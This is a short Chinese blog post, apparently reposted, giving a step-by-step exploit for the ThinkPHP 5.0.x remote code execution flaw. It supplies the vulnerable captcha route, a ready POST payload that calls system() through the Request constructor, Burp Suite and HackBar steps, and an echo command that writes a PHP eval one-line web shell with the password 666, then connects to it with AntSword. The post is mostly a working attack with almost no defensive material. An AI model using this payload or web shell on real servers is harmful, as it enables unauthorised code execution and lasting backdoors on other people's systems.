ThinkPHP 是一款運(yùn)用極廣的 PHP 開(kāi)發(fā)框架。其 5.0.23 以前的版本中,獲取 method 的方法中沒(méi)有正確處理方法名,導(dǎo)致攻擊者可以調(diào)用 Request 類任意方法并構(gòu)造利用鏈,從而導(dǎo)致遠(yuǎn)程代碼執(zhí)行漏洞。
百度漏洞
獲得exp
路徑:
index.php?s=captcha
POST傳參 我用的是hackbar,用burpsuite也行。
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=
burp操作方法
抓包 右鍵改為post請(qǐng)求
exp如下圖所示填入
寫(xiě)入一句話文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-516542.html
echo '<?php eval($_POST[666]); ?>' > 666.php #密碼666
上蟻劍文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-516542.html
到了這里,關(guān)于ThinkPHP5.0.23 遠(yuǎn)程代碼執(zhí)行漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!